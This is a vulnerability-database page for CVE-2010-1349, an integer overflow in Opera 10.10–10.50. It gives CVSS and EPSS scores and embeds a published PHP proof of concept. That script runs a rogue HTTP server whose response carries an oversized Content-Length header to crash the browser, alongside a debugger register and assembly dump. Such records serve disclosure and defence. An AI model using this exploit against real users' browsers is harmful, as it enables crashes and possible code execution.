CVE-2010-1349 Detail

CVE-2010-1349

EPSS

43.09%V3

Vector

Network

Published

2010-04-12
16h00 +00:00

Modified

2017-08-16
12h57 +00:00

Official links

CVE.org

NVD

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Notifications manage

List of Notifications

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Criteria applied when sending the alert: compared with the last alert sent + differences in CISA, EPSS, CVSS, CWE, Solutions, CPE.

Parameters

You can specify a title that will be retrieved in the alerts that will be sent out.

Specified here a CVE ID as CVE-2025-1234

Planning

Month

Next run calculation

Day

Weekday

Hour

Minute

Creation date

Last execution

Next execution

Functionality requiring a connection

This feature, which allows you to receive alerts, is only active when you are logged into your account.

CVE Descriptions

Integer overflow in Opera 10.10 through 10.50 allows remote attackers to execute arbitrary code via a large Content-Length value, which triggers a heap overflow.

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-189	Category : Numeric Errors Weaknesses in this category are related to improper calculation or conversion of numbers.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	10		AV:N/AC:L/Au:N/C:C/I:C/A:C	[email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Exploit information

Exploit Database EDB-ID : 11622

Publication date : 2010-03-02 23h00 +00:00
Author : Marcin Ressel
EDB Verified : No

<?php /* *@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ *------------------------------------------------------------------------------- * Opera 10.10 - 10.50 * Title: Integer overflow leading * to * out of bounds array access R/W * 0day poc * Autor: Marcin Ressel aka ~echo * Date: 3.03.2010 * Software: http://choice.opera.com/download/get.pl?thanks=true&sub=true&wu=1&wulang=pl&info=1 * Version: Tested on 10.10 , 10.50 but i thing other version is vulnerable to * Platform: Windows xp home sp 2 pl * Muz: http://totgeliebt.wrzuta.pl/audio/6dXgnLnsI82 (podniecilem sie) * Contanct: [email protected] * * @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ * * Exception: Access violation when writing to [01A23000] * Registers: EAX 03D89DF2 ECX 3FFF3ABE EDX 00000002 EBX FFFFFFFF ESP 0012F158 EBP 0012F160 ESI 03DBB2F8 EDI 01A23000 EIP 6781E0BA Opera_12.6781E0BA * DUMP Function: 6781E060 55 PUSH EBP 6781E061 8BEC MOV EBP,ESP 6781E063 57 PUSH EDI 6781E064 56 PUSH ESI 6781E065 8B75 0C MOV ESI,DWORD PTR SS:[EBP+C] 6781E068 8B4D 10 MOV ECX,DWORD PTR SS:[EBP+10] 6781E06B 8B7D 08 MOV EDI,DWORD PTR SS:[EBP+8] 6781E06E 8BC1 MOV EAX,ECX 6781E070 8BD1 MOV EDX,ECX 6781E072 03C6 ADD EAX,ESI 6781E074 3BFE CMP EDI,ESI 6781E076 76 08 JBE SHORT Opera_12.6781E080 6781E078 3BF8 CMP EDI,EAX 6781E07A 0F82 A4010000 JB Opera_12.6781E224 6781E080 81F9 00010000 CMP ECX,100 6781E086 72 1F JB SHORT Opera_12.6781E0A7 6781E088 833D 882AF167 00 CMP DWORD PTR DS:[67F12A88],0 6781E08F 74 16 JE SHORT Opera_12.6781E0A7 6781E091 57 PUSH EDI 6781E092 56 PUSH ESI 6781E093 83E7 0F AND EDI,0F 6781E096 83E6 0F AND ESI,0F 6781E099 3BFE CMP EDI,ESI 6781E09B 5E POP ESI 6781E09C 5F POP EDI 6781E09D 75 08 JNZ SHORT Opera_12.6781E0A7 6781E09F 5E POP ESI 6781E0A0 5F POP EDI 6781E0A1 5D POP EBP 6781E0A2 ^E9 88CEFFFF JMP Opera_12.6781AF2F 6781E0A7 F7C7 03000000 TEST EDI,3 6781E0AD 75 15 JNZ SHORT Opera_12.6781E0C4 6781E0AF C1E9 02 SHR ECX,2 6781E0B2 83E2 03 AND EDX,3 6781E0B5 83F9 08 CMP ECX,8 6781E0B8 72 2A JB SHORT Opera_12.6781E0E4 BUG-> 6781E0BA F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] <-- BUG 6781E0BC FF2495 D4E18167 JMP DWORD PTR DS:[EDX*4+6781E1D4] 6781E0C3 90 NOP 6781E0C4 8BC7 MOV EAX,EDI 6781E0C6 BA 03000000 MOV EDX,3 6781E0CB 83E9 04 SUB ECX,4 6781E0CE 72 0C JB SHORT Opera_12.6781E0DC 6781E0D0 83E0 03 AND EAX,3 6781E0D3 03C8 ADD ECX,EAX 6781E0D5 FF2485 E8E08167 JMP DWORD PTR DS:[EAX*4+6781E0E8] 6781E0DC FF248D E4E18167 JMP DWORD PTR DS:[ECX*4+6781E1E4] 6781E0E3 90 NOP 6781E0E4 FF248D 68E18167 JMP DWORD PTR DS:[ECX*4+6781E168] ... *--------------------------------------------------------------------------- * BREAK AT 6781E0BA ECX=3FFF3ABE (decimal 1073691326.) DS:[ESI]=[03DBB2F8]=00000000 ES:[EDI]=[01A23000]=??? *@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ * */ if(strtolower(substr($_ENV['OS'],0,3)) == "win") define('OS','win'); else define('OS','nix'); if(!extension_loaded('php_sockets')) { if((OS == 'win') && (!@dl('php_sockets.dll')) || ((OS == 'nix') && (!@dl('php_sockets.so')))) die('fatal php_sockets.[dll/so] '. 'not loaded '."\r\n"); //.__line__.' '.__file__."\r\n"); } /*Generated by my own fuzzer*/ $EVIL = 'HTTP/1.1 200 ok'."\r\n". 'Transfer-Encoding: identity'."\r\n". 'Date: thu 28 dec 2003 12:4:33 gmt'."\r\n". 'Server: moj zuy server'."\r\n". 'Set-Cookie: psid=d6dd02e9957fb162d2385ca6f2829a73;path=C:/'."\r\n". 'Content-Location: file://C:/boot.ini'."\r\n". 'Vary:negotiate,accept-language,accept-charset'."\r\n". 'Tcn: choice'."\r\n". 'Last-modified: sun,21 nov 2010 22:22:22 gmt'."\r\n". 'Etag: "3861-5c6-1b28fa80;386a-9dc-1b28fa80"'."\r\n". 'Accept-Ranges: bytes'."\r\n". 'Cache-Control: max-age=0'."\r\n". 'Expires: mon, 22 feb 2010 18:31:20 gmt'."\r\n". 'Content-Encoding: identity'."\r\n". 'Content-Length:9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999666'."\r\n". 'Via: 1.1 cache.zuo.pl:3128 (squid/2.7.stable6)'."\r\n". 'Keep-Alive: timeout=15, max=300'."\r\n". 'Connection: keep-alive'."\r\n". 'Content-Type: text/html; charset=iso-8859-2'."\r\n". 'Age: 1'."\r\n". 'Allow: GET,HEAD'."\r\n". 'Content-Disposition: inline'."\r\n". 'Content-MD5: Q2hlY2sgSW50ZWdyaXR5IQ=='."\r\n". 'Warning: 199 Miscellaneous warning'."\r\n". 'Trailer: Max-Forwards'."\r\n". 'Location: chrome://inspector/content/viewers/dom/dom.xul'."\r\n". 'Content-Range: bytes 21010-47021/47022'."\r\n". 'Content-Language: pl'."\r\n\r\n". '<html><head></head><body style="background-color:red;color:white;text-align:center;"><b>seq_end</b><script>location.href="http://swswqosksqowkd";</script></body></html>'; $buster = $argc - 1;// - 1; if($buster > 0) { for($i = 1; $i<$buster; $i+=2) if(('-port' == $argv[$i]) && ((int)$argv[$i + 1] > 0)) $PORT = $argv[$i + 1]; } else $PORT = 81; if(!($SOCKET = socket_create_listen($PORT))) die('fatal socket init failed'."\r\n"); socket_set_option($SOCKET,SOL_SOCKET, SO_RCVTIMEO,array("sec"=>3,"usec"=>0)); echo('SOCKET READY AT PORT '.$PORT."\r\n". 'Now connect here via opera'."\r\n"); if($CONNECT = socket_accept($SOCKET)) { $recv_buffer = null; echo('Connection ok '."\r\n"); if(socket_recv($CONNECT,$recv_buffer,8,/*msg_dontwait*/MSG_WAITALL)) { if(!@socket_write($CONNECT,$EVIL)) { socket_close($CONNECT); socket_close($SOCKET); die('I cant send payload !'."\r\n"); } } else echo('Something wrong with client side'."\r\n"); usleep(120000); socket_close($CONNECT); socket_close($SOCKET); } echo('OK ya browser must be death now'."\r\n". 'Have a nice day lol'."\r\n"); //[2010-03-03 20:47:46] //i cut be milion dolar man ;= ?>